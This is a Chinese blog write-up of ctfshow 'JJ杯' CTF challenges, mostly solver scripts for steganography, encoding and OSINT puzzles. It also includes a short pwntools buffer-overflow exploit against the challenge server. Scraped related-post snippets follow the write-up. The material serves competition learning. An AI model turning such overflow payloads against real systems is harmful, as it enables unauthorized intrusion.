ctfshow JJ杯(击剑杯) WP 随便写写

最新推荐文章于 2024-10-29 20:45:10 发布
最新推荐文章于 2024-10-29 20:45:10 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: ctf ctfshow 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42880719/article/details/121283271
版权

👴这几天不高兴 不想写。贴exp
只做MISC 其他不想做
👴感觉还可以,但怎么不想写,贴exp
吃饭去了

Misc

中文识别带师

一个个识别

你和base击剑,谁更强?

GIFFrame弄出来
然后扫码脚本

from PIL import Image, ImageSequence
from pyzbar import pyzbar
from tqdm import tqdm

def decQR(img):
    infos = pyzbar.decode(img)
    return infos[0][0].decode()

def get_QR(img):
    w,h = img.size
    for k in range(3):
        new_pic = Image.new('L', (w, h), 'black')
        for i in range(h):
            for j in range(w):
                co = str(bin(img.getpixel((j,i))[k]))[-1]
                if(co == '1'):
                    new_pic.putpixel((j,i),255)
        new_pic = new_pic.resize((1110,540))
        try:
            info = decQR(new_pic)
            return info
        except:
            pass


if __name__ == "__main__":
    base_64 = ''
    for i in tqdm(range(1235)):
        img = Image.open('./hehe/Frame{}.png'.format(str(i)))
        base_64 += get_QR(img)
    print(base_64)

然后那张gif文件尾有一串东西,00 00 00 00开头的
后面那串与504b0304异或
exp

# f = open('12.zip','rb').read()  #12.zip就是00 00 00 00开头的那个
# table = b'\x50\x4b\x03\x04'
# for i in range(len(f)):
#     print(str(hex(f[i] ^ (table[i%4])))[2:].zfill(2),end='')

不想直接写文件,然后放cyberchef生成文件弄出来
然后有个txt,base64加密之后和扫码拼出来的base64长度一样(去掉“=”)
爆表

import string
m1='''5Ye75YmR77yIRmVuY2luZ++8ieaYr+WJkeexu+i/kOWKqOS5i+S4gO+8jOi/kOWKqOWRmOS4gOaJi+aMgee7humVv+eahOW8ueaAp+mSouWJke+8jOWktOW4pumdoue9qe+8jOi6q+epv+inhOWumuacjeijhe+8jOWcqOmVv+aWueW9oueahOWcuuWcsOS4iuOAguWHu+WJkeWcqOi/nOWPpOaXtuacn+WwseW3sue7j+WHuueOsOS6hu+8jOWcqOWPpOS7o+Wfg+WPiuOAgeS4reWbveOAgeW4jOiFiuOAgee9l+mprOOAgemYv+aLieS8r+etieWbveWutuWNgeWIhuebm+ihjOOAgjE3NzYg5bm077yM5rOV5Zu95Ye75YmR5aSn5biI5ouJ5biD55Om6KW/5Z+D5Y+R5piO5LqG6Z2i572p77yM6L+Z5LiA5Y+R5piO5piv5Ye75YmR6L+Q5Yqo5LiA5Liq6YeN54K56YeM56iL56KR44CCMTg5NuW5tOWcqOmbheWFuOS4vuihjOeahOesrDHlsYrnjrDku6PlpaXov5DkvJrkuIrlsLHorr7mnInnlLflrZDoirHliZHjgIHkvanliZHnmoTmr5TotZvjgIIxOTAw5bm05Zyo5be06buO5Li+6KGM55qE56ysMuWxiuWlpei/kOS8muS4iuWinuWKoOS6hueUt+WtkOmHjeWJkeavlOi1m+OAgjE5MTPlubQxMeaciDI55pel5Zyo5rOV5Zu95be06buO5oiQ56uL5LqG5Zu96ZmF5Ye75YmR6IGU5ZCI5Lya44CCMTkxNOW5tDbmnIjlnKjlt7Tpu47pgJrov4fkuobjgIrlh7vliZHnq57otZvop4TliJnjgIvvvIzku47ogIzkvb/lh7vliZHov5Dliqjnq57otZvotovlkJHlhazlubPjgIHlkIjnkIbjgILlh7vliZHnmoTmnIDpq5jnu4Tnu4fmnLrmnoTmmK/lm73pmYXlh7vliZHogZTlkIjkvJrvvIwxOTEz5bm0MTHmnIgyOeaXpeWcqOW3tOm7juaIkOeri+OAglRoZSBoaWdoZXN0IG9yZ2FuaXphdGlvbiBpbiBDaGluYSBpcyB0aGUgQ2hpbmEgRmVuY2luZyBBc3NvY2lhdGlvbiwgd2hpY2ggd2FzIGVzdGFibGlzaGVkIGluIEJlaWppbmcgaW4gMTk3My4='''
c1 = '''4aD74aG377U13GJpaxypS++8BD5al+jn2DDRp+B/2CjdLCH4B+HzsC+8bCB/2CjdLCj3GCHzsC5nB+5hsDD7ApGJQ+D5ACj8pD5Nk+GHKpjn2D+8bCj2mCjzkpGrKpD9LD+8bCB6L+DkQ+BgACjpGp5obDBbAD+8bCjoLCGJQ+5jpDj9KpD5ACjoppjoMCHzBpCNspjFp+jn2DjoLCB/gCjtkC5Pmp5og+jqMDjZMpD7b+jFppDCMCH6Ap+8bCjoLCjtkCH7K+jIs+jtBpCNsDHzlDjwQDCNsDjzbCB0BpCNsDD9y+GklCCNsDGaQ+5TBDH8l+DmBDjwQDjpmpjEsDj1ApDwG+BAbCCNsbYZEVas4wGv77Uh4lCJ4Sp94aD74aG345Hg4wB14Kpn4wBe44CG6dj/4S+e4a+34kBC4TLu6SxB47xk77Uh6T+S4TBN4a+34kBC4kBQ4aD74aG36T+f4aLK4TBN4TBL6aDE4zd46aDh46BT46d3zzcchOs4Epj4mCjoLCGwADj0pCHzQpBAbCD5ACDMleFyMalgble2p6tyk5PKQ4e2Qnl2p1lyMTFKll7Gg1ggyTIylSeKBlFyBSFbs1F2Q5gyBSFgGKOGl4OKmSQbs11RCONq4wGv4SUK4wDv6wpC4TB+6duh44LY46UMhpjRBpjykDB/2CH8GpHzBpjBgpjdKCH6ApDWm+jm2CGFbDjn2D5QyCBXG+CNsbY4hOtypwfRhD5oBe144kDy4SUK4lCJ4Sp94wDv6wpC4KBf46pT4TLu4Sp96SG04aD74aG361uW4Sc14TU5zzcchO2RECj4mewGg1bygdbym7Okpz7ksnlKQzI2pKwbs1lyA7QyBSFgL47KmSQKkzOyBngbs1QQQ1V2pz7Ks1V2Qw/yA7QyBSFKQ4eyBLbgL47KmSQKmKQy2nFyA5Vypwtbs1Fy21bg21wbs1TyA7QyBSFgGKOGg1ekL4bgpzOgpzIGgTlGgKOGGd/yG7ZkGaPyA7QyBSFKsSOy21b2QnlQQ1qRCOYV4wGvhOFGg1sUCD5PkDjoLCjZmCG7bp512CDlB+CNsy3KSHiK5jrKSPEv1u9USx0p5PkAruyQwBikwBie5uypaHikoUiv5uWsfxAkwGYs3GJpaxypSUiioZEQaxyAruyQwBqsrxAkaxssrx0V1uJVru0BwuyV5uJ21uyp1Yny5jkkwGos5jzshO2ZhUz='''

#print(b64)
table = string.ascii_uppercase+string.ascii_lowercase+string.digits+'+/'
#tables = string.ascii_uppercase[::-1]+string.ascii_lowercase[::-1]+string.digits[::-1]+'+/'
#print(tables)
#print(table)
now_table = ''
for i in table:
    for j in range(len(m1)):
        if(i == m1[j]):
            now_table += c1[j]
            break
print(now_table)

从A开始到后面就是密码,解压

火烤大牛2.0

WPS打开,设置条件格式,含“我”的设置为红色
得到密码

_Dan1u_2.0_

写个脚本把背景色提出来写进新文件
随便写的

import openpyxl
from openpyxl import load_workbook
import string
from PIL import Image

new = Image.new('RGB',(299,199),(255,255,255))
wb = load_workbook('火烤大牛2.0.xlsx')
sheet = wb["Sheet"]
table = string.ascii_uppercase
# print(table)
color = ''
for i in range(1,200):
    for j in range(1,300):
        if(j <= 26):
            color += sheet[table[j-1]+str(i)].fill.fgColor.rgb[2:]
        if(j > 26):
            color += sheet[table[((j-1)//26)-1]+table[(j-1)%26]+str(i)].fill.fgColor.rgb[2:]

h = 0
for i in range(len(color)//6):
    if(i%299 == 0 and i != 0):
        h += 1
    new.putpixel((i%299,h),(int(color[i*6:i*6+2],16),int(color[i*6+2:i*6+4],16),int(color[i*6+4:i*6+6],16)))
new.show()
new.save('daniu!!!.png')

然后cloacked-pixel

python .\lsb.py extract .\daniu!!!.png aaaa _Dan1u_2.0_

简单的隐写

exp

from PIL import Image
print(''.join(str(Image.open('mumuzi.png').getpixel((c,0))%2) for c in range(400)))

然后2进制转ascii

看图识码

谢谢八神👴👴 microQR扫4个码就行了

看图识妹

找个好朋友一起击剑 欣赏

Crypto

单向加密

斐波拉契
exp

s = '21892299583455516902678177407943098723020343792737269219307899917648316295261201016328488524278932283999750824537049252476708912581411433116481435169820171800812269837405200686395697568215005205362068960832774807526976480752697635422484817926191507531940434634990099905635630699300684624818348075269761353018523447067460493194043463499009990512649370320429973934883223194043463499009990592737269219307899917677787420494356677625885484473810535422484817926191507531940434634990099905927372692193078999176777874204913530185234470674604948075269764356677625885484473810583621143489848422977218922995834555169026218922995834555169026777874204959425114757512643212875125'

for num in range(128):
    fibs = [1,1]
    for i in range(num-2):
        fibs.append(fibs[-2]+fibs[-1])
#print(fibs)
for i in range(32,len(fibs)):
    if(str(fibs[i]) in s):
        s = s.replace(str(fibs[i]),chr(i+1))
print(s)

么西么西?

DTMF,不知道为啥没人做

hz1 = [1209,1336,1477,1633]
hz2 = [697,770,852,941]
table = ['1','2','3','A','4','5','6','B','7','8','9','C','*','0','#','D']

s = '1336-697 1477-697 1477-697 1336-770 1209-852 1477-697 1336-770 1209-852 1336-941 1209-770 1209-852 1209-697 1209-697 1336-697 1336-941 1336-941 1477-770 1209-697 1477-770 1209-770 1477-852 1336-941 1477-852 1477-852 1477-852 1209-852 1336-770 1477-852 1336-941 1209-697 1209-697 1336-852 1209-697 1336-941 1477-697 1477-697 1477-852 1336-697 1477-770 1336-852 1209-697 1336-697 1336-941 1336-697 1209-697 1336-941 1336-770 1336-852 1477-697 1477-697 1209-770 1336-852 1209-697 1336-941 1336-852 1336-852 1209-770 1209-770 1477-852 1209-852 1477-697 1336-852 1209-852 1336-697 1336-941 1336-941 1336-941 1336-941 1336-697 1209-770 1477-852 1209-852 1336-697 1477-770 1209-770 1336-852 1336-697 1209-852 1477-852 1336-941 1209-770 1336-941 1336-770 1209-852 1336-852 1209-697 1336-770 1209-770 1336-697 1336-697 1477-697 1336-770 1336-852 1209-852 1336-697 1477-697 1209-697 1477-852 1336-770 1209-770 1209-697 1336-941 1477-770 1209-697 1336-941 1209-770 1336-852 1477-770 1336-770 1477-697 1336-852'
s = s.split(' ')
flag = ''
for i in s:
    _hz1 = int(i[:4])
    _hz2 = int(i[-3:])
    for k in range(len(hz1)):
        if(hz1[k] == _hz1):
            for j in range(len(hz2)):
                if(hz2[j] == _hz2):
                    flag += table[j*4+k]
                    break
print(flag)
import libnum
print(libnum.n2s(int(flag)))

🐕都不做

英语阅读

谷歌: 考研 osint
知乎专栏

这是哪里

百度识图,找到一张很像的,下面写了名字黄道周
搜 黄道周雕塑 广告牌,可以找到另一个视角的图
还有个微信公众号,然后去看了看公众号搜这个,没搜到,但是我看到有个黄道周公园
就搜黄道周公园,地址就在那里,后面是117.5125

小城美食

直接搜字,然后看视频。6:43

安装Arch

b站搜“安装 Arch 字幕” 第一个视频

Pwn

pwn01-My_sword_is_ready

from pwn import *
context.log_level='debug'
p = remote('pwn.challenge.ctf.show',28043)
p.recvuntil(b'bit!\n')
payload = b'a'*(0x30-0xc)+p32(664)
p.send(payload)
p.interactive()
CTFshow 击剑 部分WP
Nancy523的博客
11-13 4669
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录1.Misc中文识别带师2.Web简单的验证码easyPOP3.Pwnpwn01-My_sword_is_readypwn02-Precision_and_grace4.Osint英语阅读这是哪里卡鲁铁盒人家想玩嘛人有点多小城美食安装arph5.热身听歌识曲看图识妹进群得码 1.Misc 麻麻的 只会一题 其他的等复现再补充吧 中文识别带师 挺好玩一个题 格局打开 linux nc进环境(注意进
2024网鼎青龙组wp:Crypto1
最新发布
sleepywin的博客
11-03 902
Boneh-Durfee 攻击利用的是 lattice reduction(格约减)算法,具体来说,利用了 LLL 算法(Lenstra-Lenstra-Lovász)来进行维度缩减。此外,这种攻击也依赖于 lattice-based 技术的成功运用,并且计算量较大,需要对 LLL 算法有较深入的理解高效的实现。总之,Boneh-Durfee 攻击是一种非常经典的针对低私钥指数的 RSA 的攻击方法,通过格约减技术可以有效恢复小 ddd 情况下的 RSA 私钥。利用sagemath运行可得p,q,d。
CTFSHOW 击剑
qq_51584770的博客
11-18 846
给我看看 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); require_once("flag.php"); class whoami{ public $name; public $your_answer; public $useless; public function __construct(){ $this->name='ctfshow
[CTFSHOW]CTFSHOW击剑 部分WP
Sapphire037的博客
11-13 3347
进群得码 群里发送 击剑签到即可 所以就发送 “击剑签到即可” 然后得到flag 给我看看 三血 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); //require_once("flag.php"); class whoami{ public $name; public $your_answer; public $useless; public function
[ctfshow]击剑 web
记录学习,一起进步
06-12 1551
[ctfshow]击剑 web
CTFshow击剑osint——人家想玩嘛,人有点多超详细解法
Ztop的博客
11-14 1749
首先,在这里跟师傅们说一声抱歉,因为这次是自己第一次比较正式的出Osint题,可能有一些地方没有注意到,没有认真审核,给师傅们带来了麻烦,真的很抱歉!! 以下是人家想玩嘛、人有点多的详细解法及思路: 人家想玩嘛 百度识图,可以知道是土豪之邦——迪拜,也叫杜拜(Dubai) 根据图片,提取信息:大片类似人工湖的地方、左边凸出来的建筑、大批高建筑群。 谷歌地球查找迪拜,根据已知信息锁定地区 拉近距离,找到大致拍摄位置,大致为箭头根部位置 进入街景,多尝试几次,大概在中间一点的位置,找到拍摄位置 放大得到
2024网鼎青龙组初赛Crypto
qq_1182418846的博客
10-29 1220
这道题目涉及了ECDSA(椭圆曲线数字签名算法),AES_CBC模式加密,维吉尼亚加密先来了解下什么是ECDSA共享kk部分泄露这里是利用了共享k的攻击姿势来解题这里是将椭圆曲线上一点G点乘kdA但在这里求解不出私钥进行数字签名这里涉及到两对数字签名,同时选用k来生成dA基于以上的签名,我们可以得到等式一与等式二左右相减,得到得到k之后,求解dA将k带入等式一或二皆可第二部分是AES_CBC解密。
jj.rar_JJ_滑动窗口
09-22
JJ.rar_JJ_滑动窗口中的"JJ"可能是项目或个人的代号,而提供的jj.txt文件可能包含了关于滑动窗口协议的C++实现源代码。 滑动窗口协议的核心思想是通过设定一个固定大小的窗口,窗口内的数据可以被连续发送而无需...
jj.rar_JJ
09-24
定义一个学生类,其中有3个数据成员有学号、姓名、年龄,以及若干成员函数。同时编写主函数使用这个类,实现对学生数据的赋值输出。 要求: (1)使用成员函数实现输入、输出; (2)使用构造函数析构函数...
击剑web-给我看看
weixin_45931722的博客
11-17 379
反序列化的题 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); require_once("flag.php"); class whoami{ public $name; public $your_answer; public $useless; public function __construct(){ $this->name='ctfsho
cloacked-pixel-master
08-15
cloacked-pixel-master
Pixel
10-25
Pixel
cloacked-pixel-master带使用方法.rar
05-09
cloacked-pixel-master,图片隐写工具,ctf工具
PWN-PRACTICE-CTFSHOW-8
P1umH0的博客
01-18 2000
PWN-PRACTICE-CTFSHOW-8吃瓜-wuqian月饼II-简单的胖月饼II-容易的胖击剑-pwn01-My_sword_is_ready 吃瓜-wuqian 栈溢出,ret2text # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28059) elf=ELF("./pwn1") sy
cloacked-pixel隐写
m0_54015794的博客
01-06 6701
cloacked-pixel隐写,以月赛中的一道题为例,密码zaqqaz,得到一张图片,是cloacked-pixel隐写,使用方法如下。 cloacked-pixel安装 解压cloacked-pixel-master.zip到虚拟机 cloacked-pixel使用 加密: python lsb.py hide big.png 1.txt 123456 ps: hide:表示加密模式; big.png:待加密的png图片; 1.txt:存放payload; 123456:加密的密码 解密: pytho
探秘隐写术:cloacked-pixel,LSB下的数据隐形斗篷
gitblog_00041的博客
06-24 1355
探秘隐写术:cloacked-pixel,LSB下的数据隐形斗篷 去发现同类优质开源项目:https://gitcode.com/ 在数字世界的暗流中,信息保密是一项永恒的挑战。今天,我们为你揭开一个神秘的工具——cloacked-pixel,它是一个跨平台的Python实现的隐写术工具,让你的数据如同像素中的隐形斗篷,在图像的最细微处躲藏,只有知密者能解锁真相。 项目简介 cloacked-pi...
Ubuntu下cloacked-pixel安装与使用教程
m0_73195494的博客
03-09 1718
官方链接。
ctfshow_七夕_MISC:你会lsb吗
Altering_Ji的博客
08-10 3197
记录ctfshow网站的七夕的一道有趣的杂项题:你会lsb吗
python2配置cloacked-pixel
xiao_he0123的博客
12-27 849
python2配置cloacked-pixel
ctfshow 击剑II
06-22
很抱歉,我无法提供关于"ctfshow 击剑II"的具体信息,因为这不是一个广泛认知的活动或者技术术语。"CTF"通常是指 Capture the Flag(夺旗赛),这是一种网络安全竞赛,而"击剑"可能是一种比喻或某个特定领域的竞赛名称。如果你是在询问网络安全领域中的夺旗赛或者其他相关活动,我可以帮你了解一般的夺旗赛规则或者网络安全竞赛的形式,但针对特定的“击剑II”比赛,我建议你直接搜索相关的比赛公告或者竞赛平台获取最新准确的信息。如果你对网络安全竞赛感兴趣,我们可以聊聊这方面的一般知识。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值